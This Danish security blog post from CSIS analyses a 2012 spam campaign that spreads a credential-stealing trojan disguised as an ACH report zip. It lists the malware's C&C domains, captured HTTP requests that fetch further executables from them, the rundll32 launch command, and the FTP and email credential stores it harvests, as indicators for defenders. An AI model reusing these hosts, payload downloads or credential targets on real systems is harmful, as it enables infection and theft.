CSIS Blog: NACHA spamkampagne ruller ind over Danmark

Det har været en travl dag på kontoret. Vi har set flere spamkampagner blive skudt igang fra bl.a. Asprox BOTnettet og med forskelligt indhold. Et eksempel på en af de mere aggressive kampagner findes herunder:



Den vedhæftede fil, som modtageren skal lokkes til at åbne hedder "ACH_Report-CFA2FFEE94.pdf.zip". Zip-filen indeholder en binær kode, som ved kørsel vil inficere maskinen. Hvis man kigger i filegenskaberne opdager man hurtigt at bagmændene ikke er helt uden humor:

CompanyName
Weekfish
FileDescription
Weekfishtail
FileVersion
7.5.691.73
LegalCopyright
Copyright 
2012
InternalName
SpellMake
OriginalFilename
Food.exe
ProductName
WeekfishWell

Koden er udviklet i Visual C++, med følgende kompileringsdato: "Fri Nov 2 06:29:33 2012 UTC" og indeholder mange uønskede funktioner.

Ved kørsel vil den injekte sig i iexplore.exe processen: C:Documents and SettingsAdministratorApplication Datarapini.dll -> C:Program FilesInternet Exploreriexplore.exe, som den så anvender til at forbinde sig til en C&C server hvorfra der trækkes supplerende malware. DLL'en køres på systemet igennem en rundll der spawnes med følgende kald:

"rundll32.exe C:Documents and SettingsAdministratorApplication Datarapini.dll BuildNotificationPackage"

Den kopierer sig endvidere til systemet til følgende sti:
C:Documents and SettingsAdministratorApplication DataErypycpi.exe

I forbindelse med kommunikation med de centrale C&C servere blev følgende kontaktet af malwaren:

josemarmolclub.com.ar
aasamant.com
matheusilva.com
alispide.net
sanalturtr.com
rdquark.com
fundepalma.org

At der downloades supplerende malware kan dokumenteres med nedenstående (mellemrum indlagt af CSIS):

GET /hr5JHr1.exe HTTP/1.0
Host: fundepalma.org
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

GET /ttmX4XF.exe HTTP/1.0
Host: matheusilva.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

GET /V61zmw.exe HTTP/1.0
Host: alispide.net
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Det matcher meget godt funktionen, som også afsløres i den binære kode:


Denne kampagne har til formål at binde den inficerede maskine ind i et BOTnet og herfra systematisk udtrække sensitive oplysninger herunder FTP brugernavne og passwords:

SoftwareVanDykeSecureFX
IMAP User
nintendo
Yandex
SoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings
WinFTP
PopServer
PopAccount
sites.xml
Login
POP3 User
SoftwareSotaFFFTPOptions
SoftwareBulletProof SoftwareBulletProof FTP ClientMain
MozillaSeaMonkey
fireFTPsites.dat 
FreshFTP
Pocomail
inetcomm server passwords
FTPList.db
Comodo
ServerName
SoftwareFTP ExplorerProfiles
SoftwareRITThe Bat!Users depot
ChromePlus
SoftwareFTPWareCOREFTPSites
GlobalSCAPECuteFTP Pro
[..]

C&C serverne, hvorfra der trækkes supplerende malware, er hardkodet i den binære kode:


Vi har blokeret for samtlige domæner i CSIS Secure DNS og yder derved også beskyttelse igennem Heimdal Security Agent PRO og Corporate.

Den skadelige kode opnår følgende antivirus detektion:

Antivirus    Result    Update
Agnitum     -     20121109
AhnLab-V3     Win-Trojan/Downloader.178688.O     20121109
AntiVir     TR/Bredo.EB.1     20121109
Antiy-AVL     -     20121108
Avast     -     20121109
AVG     -     20121109
BitDefender     -     20121109
ByteHero     -     20121107
CAT-QuickHeal     -     20121109
ClamAV     -     20121108
Commtouch     -     20121109
Comodo     -     20121109
DrWeb     Trojan.PWS.Stealer.946     20121109
Emsisoft     Trojan.Win32.Agent.AMN (A)     20121109
eSafe     -     20121107
ESET-NOD32     Win32/PSW.Agent.NTM     20121109
F-Prot     -     20121109
F-Secure     -     20121109
Fortinet     -     20121109
GData     -     20121109
Ikarus     Trojan-PWS.Win32.Tepfer     20121109
Jiangmin     -     20121109
K7AntiVirus     Trojan     20121109
Kaspersky     UDS:DangerousObject.Multi.Generic     20121109
Kingsoft     Win32.Malware.Generic.a.(kcloud)     20121105
McAfee     -     20121109
McAfee-GW-Edition     -     20121109
Microsoft     -     20121109
MicroWorld-eScan     -     20121109
Norman     -     20121108
nProtect     -     20121109
Panda     -     20121109
PCTools     Trojan.Fakeavlock     20121109
Rising     -     20121109
Sophos     Troj/Bredo-ADK     20121109
SUPERAntiSpyware     -     20121109
Symantec     Trojan.Fakeavlock     20121109
TheHacker     -     20121107
TotalDefense     -     20121108
TrendMicro     -     20121109
TrendMicro-HouseCall     TSPY_ZBOT.GEL     20121109
VBA32     -     20121109
VIPRE     -     20121109
ViRobot     -     20121109